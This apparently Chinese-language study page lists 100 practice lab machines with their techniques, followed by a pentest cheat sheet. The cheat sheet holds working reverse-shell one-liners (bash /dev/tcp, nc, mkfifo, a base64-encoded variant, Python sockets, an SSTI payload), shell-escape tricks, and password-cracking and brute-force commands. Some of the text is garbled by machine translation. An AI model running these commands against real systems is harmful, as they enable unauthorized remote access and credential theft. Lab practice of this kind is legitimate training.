百靶挑战

百靶挑战

序号	难度	涉及内容
1	easy	常规信息收集、ssh 爆破、hydra使用
2	easy	常规信息收集、ftp利用、id_rsa利用、凭据收集、sudo提权、docker 提权
3	easy	常规信息收集、enum4linux 工具使用、smbclient 使用、smb getshell、suid 提权、gdb提权
4	easy	常规信息收集、base64解码、ssh 私钥利用、id_rsa私钥爆破、sudo-base64提权
5	easy	常规信息收集、tftp利用、id_rsa利用、suid 提权、特殊文件分享提权、strings使用、$path 更改
6	easy	smb 枚举、wimrm利用、runascs 提权使用
7	medim	文件上传绕过、命令执行、敏感信息查找、suid提权
8	easy	ftp利用、 knockd利用、suid - capsh 提权
9	easy	漏洞挖掘、RCE利用、pidstat 提权、python脚本编写、hash碰撞
10	easy	目标爆破、FUZZ测试、JWT漏洞、nc反弹shell、命令执行利用、命令执行bypass、sudo提权、screen 提权
11	easy	wordpress、msf利用、敏感信息收集、sudo提权
12	easy	cms made simple CMS 拿shell、searchsploit 运用、msf利用、$PATH&getfacl 了解、特殊脚本提权
13	medim	xxd使用，hexdump转换、sudo提权、pspy64进程分析、2to3利用、python 反弹shell
14	easy	信息收集、FUZZ测试、图片隐写、exiftool使用、suid提权、calife提权、conky 提权、私钥登录
15	easy	信息收集与分析、日志getshell、公钥提权、$PATH滥用提权
16	easy	wordpress、wpscan爆破、图片隐写、keepass2john工具使用、密码喷洒、john爆破keyfile、keepass使用、任务计划分析排查、pspy64使用、linpeas使用
17	easy	fuzz测试、wfuzz使用、zip爆破、exp使用、文件上传漏洞利用、脏牛提权
18	easy	常规渗透手段、zip2json利用、john爆破利用、msf 利用
19	easy	常规渗透手段、sql注入、后台爆破、cms利用拿shell、johnshadow爆破利用
20	easy	aPphp GETSHELL、searchsploit使用、凭据收集、gdb使用、 缓冲区溢出漏洞（难）、pattern_create.rb、pattern_offset.rb 使用、测定EIP溢出偏移量
21	easy	细节发现、htm源码查看、命令执行、php源码查看、sudo之ip提权
22	easy	ssti注入到getshell，ssti反弹shell，flask 框架了解、sudo提权—LD_PRELOAD
23	easy	敏感信息收集、Brainfuck解密、替换密码、ssh利用、passwd提权
24	easy	图片隐写、图片调试、exiftool使用、sudo-nc提权、ssh私钥提权、ssh2john使用、john爆破私钥、ssh 私钥利用
25	easy	ftp利用、web 渗透、漏洞挖掘、后台爆破、sudo提权、特殊文件提权
26	easy	前端分析、文件上传绕过、提示信息利用、shadow 爆破、hydra 使用
27	easy	ftp利用、google反图搜索、 suid提权、s-nail 提权
28	easy	qdpmcms利用、mysql利用、host碰撞、shellinaboxd使用、pspy分析隐藏进程提权
29	medim	文件白名单绕过、反弹shell、$paht环境变量更改、python 库劫持提权、Reptile提权、sandfly-processdecloak使用
30	easy	Akamai  防火墙、绕过wall、fuzz、文件包含利用、exiftool提权、sudo提权、ssh私钥利用
31	easy	LUKS v2破解、bruteforce-luks工具使用、cryptsetup使用、cap_dac_read_search=eip、mysql使用
32	easy	文件包含利用、shadow爆破、sudo-awk 提权、python库劫持提权、python反弹shell
33	medim	后台爆破、waf 绕过、xff 绕过、日志分析、sha256爆破、脚本分析、sudo提权
34	easy	nginx配置错误利用、openssl 使用、doas使用、ssh私钥、ssh-keygen 提权
35	easy	信息收集、漏洞挖掘、sql注入、suod-awk 提权、suid 提权、$PATH环境变量提权
36	easy	ftp使用、opensll-id_rsa解密、图片隐写、stegseek使用、linpeas.sh 使用、shadow写入提权
37	easy	cms-made-simple 拿shell、sql 注入、rce利用、pspy64分析进程、base32提权、stegseek使用、图片隐写
38	easy	cms getshell、sql注入、任意文件上传、凭证收集、端口转发、socat使用、python 模块利用提权
39	easy	后门爆破、子域名扫描、gobuster-fuzz、文件包含配合 ftp 服务中实现“日志中毒”getshell、zip2john使用、pypykatz使用、 lsass.DMP文件解密、john the ripper 爆破shadow
40	medim	子域名扫描、后台爆破、wfuzz 爆破、cookie 注入、id_rsa 私钥利用、perl 反弹shell、webmin利用
41	easy	python 脚本分析、socket了解、socket 客户端脚本编写、nc 使用、ftp 使用、sudo-dirb 提权、dirb 读取shadowid_rsa文件
42	easy	常规信息收集、漏洞挖掘、sql盲注、python库劫持提权
43	easy	常规信息收集、wordpress利用、ssh爆破、主机信息收集、git 提权
44	easy	文件上传漏洞、进程分析、python 反弹shell、jar 包反弹shell
45	easy	漏洞挖掘、rfi 远程文件包含利用、伪协议利用、suid-php提权
46	easy	本地文件包含、php伪协议利用、php 利用链getshell
47	easy	命令执行绕过、命令执行利用、凭据收集、base64解码、john 爆破、vim 提权
48	easy	ftp利用、mysql爆破、mysql数据库使用、爆破zip 密码、shadow 爆破、利用Capabilities实现权限提权
49	easy	信息收集、图片隐写、cupp 使用、社工字典生成、ssh 爆破、socat 提权
50	easy	源码查看、莫尔斯码、base64、hash 爆破
51	easy	后台爆破、hydra 爆破登录页面、CyberChef加密、凭据收集、nano 提权
52	easy	信息收集、凭据收集、cron 提权、sudo 提权
53	easy	apache rce、crontab 提权、hydra 使用、ssh 爆破、nano 提权、sudo 提权
54	easy	Malbolge Languages、strings查看、hydra爆破、sudo perl 提权
55	easy	fuzz 测试、sql注入、图片隐写、wtfutil 提权
56	easy	oteldriud 3.0.3getshell、ttylog提权、wkhtmltopdf利用
57	easy	命令执行、sudo提权、trans 提权
58	easy	Online Admission System getshell、gerapy提权
59	easy	信息收集、mac 地址修改、task 提权
60	easy	ssh 私钥利用、ln 软链接利用
61	easy	wpDiscuz插件漏洞、文件上传绕过、sudo—nokogirl提权 、passwd 后门写入提权。
62	easy	计算表达式利用、sudo-python模块劫持提权、sudo-脚本篡改提权
63	easy	audacity使用、音频隐写、sudo-ln 提权
64	easy	图片隐写、stegseek 使用、音频隐写、私钥利用、二进制逆向、ida 使用
65	easy	目录扫描、id_rsa文件密码暴破、linpeas.sh 使用、pspy64 使用
66	easy	玫瑰十字会密码、域名配置、命令执行、fuzz、perl 提权、本机信息收集、hydra 爆破、socat提权
67	easy	DNS服务利用、sudo-nginx 提权
68	easy	sql 注入利用、sqlmap使用、sudo—lynx 提权
69	easy	fuzz 测试、ascii85编码、zip 爆破、hydra 爆破、命令替换、busybox使用、getcap—node提权
70	easy	信息收集、漏洞挖掘、命令执行绕过、suid—sulogin 提权、gcc 编译
71	easy	ftp利用、Stegseek 利用、文件上传、十六进制解码、idaghidra 逆向elf、缓冲区溢出提权
72	easy	信息收集、Apache_HTTP_Server_Module_Backdoor利用、
73	easy	webui-aria2、webui-aria2写入公钥、rtorrent提权
74	easy	信息收集、brainfuck 编码、webminusermin权限获取、tar读取任意文件、tar提权
75	easy	信息收集、memcached利用、命令限制绕过、
76	easy	ftp使用、端口敲打、python 脚本编写、命令执行漏洞、sudo—genie 提权、程序分析、pkexec提权
77	easy	StegSeek爆破、图片隐写、日志利用getshell、sudo—gedit&xauth提权
78	easy	信息收集、兔子洞、ftp、zip爆破、ffuf 测试、sudo—CVE-2021–3156 提权、msf 提权
79	easy	信息收集、id_rsa、crunch使用、cookie、shell 脚本编写、
80	easy	qdPM getshell、图片隐写、steghide 使用、stegseek使用&爆破、awk 提权、sql 盲注、命令执行漏洞、脏牛提权
81	easy	pytorch lightning getshell、CVE-2021-4118、CVE-2022-1292、sudo—tee提权
82	easy	信息收集、docker 注册表利用、fzf 提权
83	easy	spip 利用、内网凭据收集、mysql 利用、CVE-2023-4911利用
84	easy	ftp 利用、反弹shell、vim 提权
85	easy	lfi利用、id_rsa 私钥爆破、sudo提权—$path劫持
86	easy	信息收集、ftp 爆破、hydra 使用、定时任务提权、文件篡改
87	easy	漏洞挖掘、前端调试、sudoers.d、sudo 提权、tar 通配符漏洞提权
88	easy	信息收集、漏洞挖掘、文件上传绕过、绕过disable_functions、tcpdump流量抓取&提权、exiftool 漏洞提权、CVE-2021-22204提权
89	easy	命令注入、docker、内网扫描、主机存活扫描、fscan 使用
90	easy	CVE-2022-23935、exiftool RCE、
91	easy	漏洞挖掘、越权测试、python爬虫、脚本编写、hydra 爆破、凭据收集
92	easy	ident、hydra 爆破、路径劫持
93	easy	typecho cms、后台爆破、敏感信息收集、john 破解hash、文件上传、sudo-awk提权、任务计划提权
94	easy	ffuf模糊测试、ods文件爆破、端口转发、brainfuck编码、
95	easy	OpenSSL SSH 漏洞利用、sudo—curl提权、CVE-2022-0847提权、passwd 写入
96	easy	图片隐写、hydra 爆破、stegseek爆破、stegoVeritas工具使用、CVE-2022-2588 提权
97	easy	ffuf 、wffuf 测试、id_rsa、进程分析、凭据收集
98	easy	信息收集、密码制作、hydra爆破、凭据收集、kdbx文件爆破、keepassxc使用
99	easy	信息收集、nc利用、凭据收集、mail、sudo—wine 提权
100	easy	SQL 注入、文件上传绕过和 tar 通配符注入提权

技能总结

信息收集

主机发现

方法一、arp-scan -I eth0 -l （指定网卡扫）
arp-scan -l
arp-scan -I eth0 -l
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth1 -r 192.168.31.0/24

方法四、fping -aqg 指定网段
fping -aqg 10.0.0.0/24

方法五、nmap 指定网段
nmap -sn 192.168.31.0/24

端口扫描

nmap -sC -sV -p- -T4 -oN Nmap_results.txt IP
msf6 > db_nmap -T4 -A -p- 172.16.1.195

目录扫描

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.188 -x php,txt,html

host碰撞

wfuzz -c -w domain.txt -u 192.168.1.130 -H "HOST: FUZZ"
gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 100 -u za1.hmv
ffuf -c -r -u http://192.168.1.130 -H "HOST: FUZZ"  -w urls.txt
ffuf -u http://midnight.coffee -w SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H '主机：FUZZ.midnight.coffee' -fw 561
wfuzz -u 'http://midnight.coffee' -H 'Host: FUZZ.midnight.coffee' -t 100 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hh 1690

FUZZ测试

gobuster fuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -u http://192.168.1.222/includes.php?FUZZ=/etc/passwd --exclude-length 2
gobuster fuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -u "dev.medusa.hmv/files/system.php?FUZZ=id" -b 400,404 --exclude-length 0
wfuzz -c -w /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u 192.168.1.222/includes.php?FUZZ=/etc/passwd --filter "l=2"
ffuf -u http://192.168.1.220/FUZZ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -mc 200
wfuzz -c --hc=404 --hh=2 -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 'http://192.168.1.222/includes.php?FUZZ=/etc/passwd'
gobuster fuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 404 -u http://192.168.0.249/scout/FUZZ/docs

权限获取

find / -type f -writable 2>/dev/null

反弹shell

反弹shell生成网站：https://www.revshells.com/

/bin/bash -i >& /dev/tcp/192.168.1.158/8889 0>&1
bash+-c+'bash+-i+>%26/dev/tcp/192.168.11.158/23332+0>%261'
nc 192.168.1.158 8989 -e /bin/bash
'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.181 8888 >/tmp/f'
echo ` echo "cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4wLjAuMyA0NDQ0ID4vdG1wL2Y=" | base64 -d ` | sh -

SSTI反弹shell

/?cmd={%25+for+x+in+().__class__.__base__.__subclasses__()+%25}{%25+if+"warning"+in+x.__name__+%25}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%25endif%25}{%25endfor%25}&input=bash+-c+'bash+-i+>%26/dev/tcp/10.0.0.4/9001+0>%261'

python反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.7.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
或者
script /dev/null -c bash

Ctrl + Z
stty raw -echo ;fg
stty rows 38 columns 116
export TERM=xterm


$python3 -c 'import pty; pty.spawn("/bin/bash")'
$export SHELL=bash
$export TERM=xterm-256color
Ctrl-Z
$ stty raw -echo;fg
$ reset（回车）


┌──(emvee㉿kali)-[~/Documents/HMV/XMAS]
└─$ stty raw -echo ; fg ; reset  
[1]  + continued  rlwrap nc -lvnp 1234
$ stty columns 200 rows 200
stty: 'standard input': Inappropriate ioctl for device
$ python3 -c 'import pty; pty.spawn(["env","TERM=xterm-256color","/bin/bash","--rcfile", "/etc/bash.bashrc","-i"])'
www-data@xmas:/$ 


script /dev/null -c bash
CTRL+Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows <rows> columns <columns>


python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+z快捷键
stty -a
stty raw -echo;fg
reset

原理参考资料：https://nepcodex.com/2021/06/upgrade-to-an-intelligent-reverse-shell/

爆破枚举

爆破后台

wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ"  --hc 302 http://testphp.vulnweb.com/userinfo.php

jwt密钥爆破

hashcat -a 0 "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWkiLCJyb2xlIjoidXNlciIsImlhdCI6MTcwMzEzMzg3NH0.MoZVjr58wrqxKrsYztS12KFY3kThOUqgeCv-TW9UtPs" /usr/share/wordlists/rockyou.txt
john -w=/usr/share/passwd.txt jwt.hash

kdbx 爆破

keepass2john Challenge.kdbx > keepasshash.txt
john keepasshash.txt
sudo apt install keepass2

sha256 爆破

john hash256 --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256

zip 文件爆破

zip2john old_files.zip > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
或者
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt root.zip

shadow 文件爆破

john shadow --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt

id_rsa私钥爆破

ssh2john id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

ods 文件爆破

libreoffice2john shellfile.ods > ods.hash
john ods.hash --wordlist=/usr/share/wordlists/rockyou.txt

图片隐写

exiftool

binwalk

binwalk -Me filename.png. -Me用于递归提取任何文件

用python从照片中提取EXIF信息

import exifread
 
origin_file_path = './origin.jpg'
 
with open(origin_file_path, "rb") as image_file:
    tags = exifread.process_file(image_file)
 
for key in tags.keys():
    value = str(tags[key])
    print('{0}:{1}'.format(key, value))

在线网站

https://georgeom.net/StegOnline/checklist
https://exif.tuchong.com/view/13981320/
https://www.bytedig.com/web/ocr
https://www.bytedig.com/web/image-exif

端口转发

nc 端口转发

nc -nlktp 8011 -c "nc 127.0.0.1 8000"
nc -nc 8011 -c "nc 127.0.0.1 8000"

文件传输

nc 文件传输

接受端：nc -l -p 2222 < exp
发送端：nc -w 3 192.168.1.140 2222 < exp

php 文件传输

发送端：php -S 0.0.0.0:12345
接受端：wget http://ip:12345/exp

python3 文件传输

发送端：python3 -m http.server
接受端：wget http://ip:12345/exp

ssh 文件传输

1、从服务器上下载文件
scp username@servername:/path/filename /var/www/local_dir（本地目录）

 例如scp [email protected]:/var/www/test.txt  把192.168.0.101上的/var/www/test.txt 的文件下载到/var/www/local_dir（本地目录）

2、上传本地文件到服务器
scp /path/filename username@servername:/path   

例如scp /var/www/test.php  [email protected]:/var/www/  把本机/var/www/目录下的test.php文件上传到192.168.0.101这台服务器上的/var/www/目录中


3、从服务器下载整个目录
scp -r username@servername:/var/www/remote_dir/（远程目录） /var/www/local_dir（本地目录）

例如:scp -r [email protected]:/var/www/test  /var/www/  

4、上传目录到服务器
scp  -r local_dir username@servername:remote_dir
例如：scp -r test  [email protected]:/var/www/   把当前目录下的test目录上传到服务器的/var/www/ 目录

文件下载

# From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh

# Without curl
python -c "import urllib.request; urllib.request.urlretrieve('https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh', 'linpeas.sh')"

python3 -c "import urllib.request; urllib.request.urlretrieve('https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh', 'linpeas.sh')"

权限提升

• Escape rbash or rkash

• try basic commands and see what you can run

• ls,pwd,cd,env,set,export,vi,cp,mv

• echo $PATH

• usually set too one or two directories

• echo $SHELL

• find out what shell we are in

• if ‘/’ is allowed

• just run /bin/sh

• if you can set PATH or SHELL variables

• export PATH=/bin:/usr/bin:$PATH

• export SHELL=/bin/sh

• if you can ‘cp’

• cp /bin/sh /dir/from/path; sh

• :set shell=/bin/bash

• :shell

• option2: :! /bin/bash

• Awk Command

• awk ‘BEGIN {system(“/bin/sh”)}’

• Find Command

• find / -name blahblah -exec /bin/awk ‘BEGIN {system(“/bin/sh”)}’ ;

• find / -name blahblah -exec /bin/sh ;

• ftp

• !/bin/sh

• gbd

• !/bin/sh

• more / less /man

• !/bin/sh

• vi / vim

• :set shell=/bin/sh

• :shell

• or

• :!/bin/sh

• uname -a

• sudo -l

• cat /proc/version

• get linux enviorment

• env

• find Users/hashes

• cat /etc/passwd

• cat /etc/shadow

• SUID/SGID

• find / -perm -u=s -type f

• find / -perm -u=s -type f 2>/dev/null

• dpkg -S FILE

• find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

• list of exploitable SUID

• SSH Keys

• stored in ~/.ssh/

• stored in /etc/ssh

• check other places as well

• File Capabilities

• getcap FILE

• getcap tutorial

• Finding Clear Credentials

• grep -i user FILE

• grep -i pass FILE

• find . -type -f -maxdepth 4 | xargs grep -i “password”

• TCPDump

• tcpdump -nnXSs 0 -i lo

• tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

• Super user

• su USERNAME

• enter pass to sign into new user

• Download Files

• wget

• curl

• Services Running as Root

• ps aux | grep root

• ps -f | grep root

• Applications Installed

• ls -lah /usr/bin/

• ls -lah /sbin/

• TTY

• python -c ‘import pty;pty.spawn(“/bin/bash”)’

• echo os.system(‘/bin/bash)’)

• Invoke Shell through different languages:

• python: exit_code = os.system(‘/bin/sh’) output = os.popen(‘/bin/sh’).read()

• perl -e ‘exec “/bin/sh”;’

• perl: exec “/bin/sh”;

• ruby: exec “/bin/sh”

• lua: os.execute(‘/bin/sh’)

• irb(main:001:0> exec “/bin/sh”

• Ping Scan without Nmap

• for i in {1..254}; do ping -c 1 -W 1 10.1.1.$i | grep ‘from’; done

• Port Scan with Netcat

• nc -vv -z localhost 1-80 > file.txt 2>&1

• SSH Port Forwarding

• ssh -L 80:192.168.144.4:80 [email protected]

• forward local port 80 to 192.168.144.4 port 80

• ssh -L localport:destip:destport pivothost

• Cracking Shadow/Passwd File

• unshadow /etc/passwd /etc/shadow > unshadow

• john –wordlist=/usr/share/wordlists/rockyou.txt unshadow

• Cron jobs

• pspy

• ./pspy64

msf脚本

use post/multi/recon/local_exploit_suggester

辅助网站

https://gtfobins.github.io/gtfobins/ip/

提权工具

pspy64

间谍64是一个过程监控Linux系统的工具，提供实时信息正在运行的进程。它帮助安全专业人员和系统管理员识别潜在的安全问题漏洞或者可疑活动。该工具跟踪并显示进程交互，有助于发现意外或潜在的恶意行为。

下载：

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

linpeas

林豌豆是一个自动化工具，旨在识别漏洞和错误配置在Linux系统中。其主要目的是为了方便特权升级在安全测试或道德评估期间在 Linux 系统上进行。该工具检查系统的各个方面并生成详细的报告，帮助识别和解决潜在的安全漏洞。

下载：

wget-q https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

linux-smarter-enumeration

这个 shell 脚本将显示相关信息有关本地 Linux 系统的安全性，有助于升级权限。

下载：

wget"https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh"-O lse.sh;chmod700 lse.sh

或者

curl"https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh"-Lo lse.sh;chmod700 lse.sh

SUID、SGID 和查看功能

查看 SUID 二进制文件的命令：
find / -type f -perm-4000-ls2>/dev/null
查看 SGID 二进制文件的命令：
find / -type f -perm -g+s 2>/dev/null
查看功能的命令：
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null

正在运行的进程

显示系统上所有正在运行的进程的完整扩展列表：

ps-faux

显示系统上监听的 TCP 套接字列表，包括 IP 地址和监听端口号，以及每个套接字上等待连接的关联程序（进程）：

ss -nltp

查看任务计划

按指定时间间隔运行的任务：

cat /etc/crontab

检查可写目录和文件

检查我们有写入权限的目录或文件：

find / -writable|grep-v-E"proc|dev"

靶场获取